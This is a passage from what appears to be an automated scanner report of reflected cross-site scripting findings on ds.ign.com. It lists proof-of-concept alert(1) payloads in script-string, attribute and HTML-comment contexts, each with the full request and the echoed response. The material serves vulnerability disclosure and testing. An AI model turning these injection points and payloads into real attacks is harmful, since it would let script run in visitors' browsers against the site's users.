        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abbe6"-alert(1)-"60b113bb3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/games.html?abbe6"-alert(1)-"60b113bb3a0=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-261436646-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041713228v-1n-12mc+1297041713228mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 180122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All Nintendo DS &
...[SNIP]...
f(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/games.html?abbe6"-alert(1)-"60b113bb3a0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd18"><script>alert(1)</script>8dcff63431b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1207569308-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709658v-1n-12mc+1297041709658mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 179322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e43"><script>alert(1)</script>9a1b0f2269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-647456477-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041710784v-1n-12mc+1297041710784mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84e66"-alert(1)-"8a875710ab2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/images.html?84e66"-alert(1)-"8a875710ab2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26296-1336603634-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041718598v-1n-12mc+1297041718598mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/images.html?84e66"-alert(1)-"8a875710ab2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a6fd"-alert(1)-"011aedbdd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-2078814728-13;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:00 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041720754v-1n-12mc+1297041720754mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"><script>alert(1)</script>a7609ad19bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?92f97"><script>alert(1)</script>a7609ad19bc=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-2112530193-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:57 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041717799v-1n-12mc+1297041717799mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/latest-updates.html?92f97"><script>alert(1)</script>a7609ad19bc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.159. http://ds.ign.com/index/latest-updates.html [types parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ad3"><script>alert(1)</script>66fd0e3ba98 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?types=all15ad3"><script>alert(1)</script>66fd0e3ba98 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-180368243-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041725149v-1n-12mc+1297041725149mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/latest-updates.html?types=all15ad3"><script>alert(1)</script>66fd0e3ba98&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.160. http://ds.ign.com/index/latest-updates.html [types parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a11"-alert(1)-"885b288a082 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?types=all89a11"-alert(1)-"885b288a082 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31243-781560067-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041727117v-1n-12mc+1297041727117mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
Guard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/latest-updates.html?types=all89a11"-alert(1)-"885b288a082",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.161. http://ds.ign.com/index/latest-updates.html [types parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into an HTML comment. The payload 22b01--><script>alert(1)</script>4e06c977745 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index/latest-updates.html?types=all22b01--><script>alert(1)</script>4e06c977745 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1383669598-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041729788v-1n-12mc+1297041729788mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<!-- http://content-api.ign.com/v1/articles.xml.us?max=250&channelId=532&types=all22b01--><script>alert(1)</script>4e06c977745&startDate=20110107&endDate=20110206 -->
...[SNIP]...

1.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a58"-alert(1)-"739a0385749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/news.html?b8a58"-alert(1)-"739a0385749=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1029504208-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041713640v-1n-12mc+1297041713640mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 126773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/news.html?b8a58"-alert(1)-"739a0385749=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c65"><script>alert(1)</script>bad51faa319 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-820832511-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709665v-1n-12mc+1297041709665mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 126654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ea7"><script>alert(1)</script>66a0bffc619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1770290604-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041706627v-1n-12mc+1297041706627mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddc6"-alert(1)-"91790f839c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/previews.html?bddc6"-alert(1)-"91790f839c5=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-602718058-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041711043v-1n-12mc+1297041711043mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/previews.html?bddc6"-alert(1)-"91790f839c5=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52616"-alert(1)-"17261e88bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?52616"-alert(1)-"17261e88bc1=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
